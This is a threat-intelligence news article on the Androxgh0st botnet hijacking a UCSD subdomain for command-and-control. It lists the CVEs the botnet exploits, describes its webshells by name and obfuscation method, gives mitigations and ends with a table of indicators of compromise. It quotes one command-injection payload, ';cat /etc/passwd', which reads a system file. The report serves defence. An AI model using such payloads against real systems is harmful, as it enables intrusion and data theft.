CloudSEK’s latest investigation has uncovered a significant escalation in the tactics of the Androxgh0st botnet, which has been active since at least March 2023.
The operators have now exploited a misconfigured subdomain belonging to the University of California, San Diego (UCSD), specifically the “USArhythms” portal, to host a command-and-control (C2) logger panel.
This subdomain, associated with the USA Basketball Men’s U19 National Team, was repurposed as a central hub for logging malicious botnet activity and orchestrating further attacks.
Androxgh0st is known for its rapid evolution, weaponizing a diverse set of initial access vectors (IAVs) targeting widely used platforms and frameworks.
Since August 2024, CloudSEK’s TRIAD team has tracked the botnet’s exploitation of over 20 vulnerabilities, including those in Apache Shiro, Spring Framework (Spring4Shell), WordPress plugins, and IoT devices such as Lantronix PremierWave.
The attackers leverage these vulnerabilities for remote code execution (RCE), command injection, and sensitive data exfiltration.
The C2 logs analyzed by CloudSEK reveal a broad spectrum of exploitation attempts, including JNDI and OGNL injections, Unix command injections, and targeted attacks against WordPress plugins and IoT command interfaces.
Attack Techniques
The Androxgh0st operators employ sophisticated exploitation techniques. For instance, they exploit JNDI injection vulnerabilities in Apache Shiro and FasterXML jackson-databind, enabling RCE by directing vulnerable servers to connect to attacker-controlled RMI servers.
Unix command injection is also prevalent, with payloads like “;cat /etc/passwd” used to extract sensitive user information.
The botnet targets the WordPress “Popup Maker” plugin (CVE-2019-17574) to trigger information disclosure, and leverages command injection in the Lantronix WLANScanSSID function (CVE-2021-21881) to gain remote control over IoT devices.
Attacks against Apache Struts utilize complex OGNL payloads to manipulate the Java runtime environment, while Spring Framework exploitation (Spring4Shell, CVE-2022-22965) involves tampering with class loader properties to achieve RCE.
The logs also indicate the deployment of cryptomining malware, with JSON-RPC requests fetching mining tasks from cryptocurrency pools.
Webshell Arsenal
Persistence is maintained through the deployment of multiple webshell variants, including:
- abuok.php: Utilizes hex2bin and eval obfuscation for remote code execution via POST requests.
- myabu.php: Employs ROT13 obfuscation, enabling arbitrary code execution.
- scwj.php: Functions as a file upload backdoor for further payload delivery.
- baocun.php: Acts as a code dropper, writing attacker-supplied scripts to disk.
These webshells are designed to evade detection and provide attackers with ongoing access for lateral movement and additional exploitation.
The compromise of academic infrastructure for C2 hosting exposes sensitive data, facilitates further malware distribution, and enables cryptomining operations.
The misuse of trusted university domains increases the risk of brand damage and regulatory repercussions.
CloudSEK recommends immediate patching of affected systems, strict firewall controls on RMI/LDAP/JNDI traffic, regular audits for suspicious PHP files, and the deployment of web application firewalls (WAF) or runtime application self-protection (RASP) solutions.
Detection strategies should focus on identifying obfuscated webshells, suspicious POST parameters, and anomalous outbound traffic to known malicious domains.
Indicators of Compromise (IOC)
| Indicator | Type | Comments |
|---|---|---|
| cv032vemsb87jtt2p11g5h8xztka6kruj[.]oast[.]me | Subdomain | General C2 activity |
| d0i0taritt4c9dh9hln06thpknw9dcqhu[.]oast[.]today | Subdomain | General C2 activity |
| ch14vjilcoecm8580ft0g6xsmrkewgwro[.]oast[.]live | Subdomain | General C2 activity |
| chcmp35oujaubpa7e86g1wz9dypg9oc67[.]oast[.]site | Subdomain | General C2 activity |
| chi2p4r4bcdfd791dh50c6dpgu4h9rdhc[.]oast[.]fun | Subdomain | General C2 activity |
| cj7409i4t88ukb0publgakedcbwnz7nzy[.]oast[.]live | Subdomain | Lantronix WLANScanSSID Command Injection |
| cv032vemsb87jtt2p11gwf68p1xw7rgtk[.]oast[.]me | Subdomain | Fastjson-v1.2.47 RCE |
| cj7409i4t88ukb0publgjtkyt534mnrby[.]oast[.]live | Subdomain | Spring4Shell exploitation |
| chke3769l5m6jbj8hq90fu71kckky5x63[.]oast[.]fun | Subdomain | Apache Shiro, FasterXML jackson-databind |
| 185.172.128[.]93 | IP Address | CVE-2024-4577 exploitation |
| 9e1fb14b747b5bdaf817845007a47752 | MD5 Hash | Webshell (abuok.php) |
| d6efe92ca18570f940a720e51af77f72 | MD5 Hash | Webshell (myabu.php) |
| f65749ddf93e890b48b3bde77b1302aa | MD5 Hash | Webshell (scwj.php) |
| 5a12416857547341493b436299e9b886 | MD5 Hash | Webshell (baocun.php) |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Warning for WordPress Admins – Fake SEO Plugins Hijacking Websites")
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Apache APISIX Flaw Enables Unauthorized Cross-Issuer Access Due to Misconfigurations")
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Instagram Adopts Daily TLS Certificate Rotation with One-Week Validity")
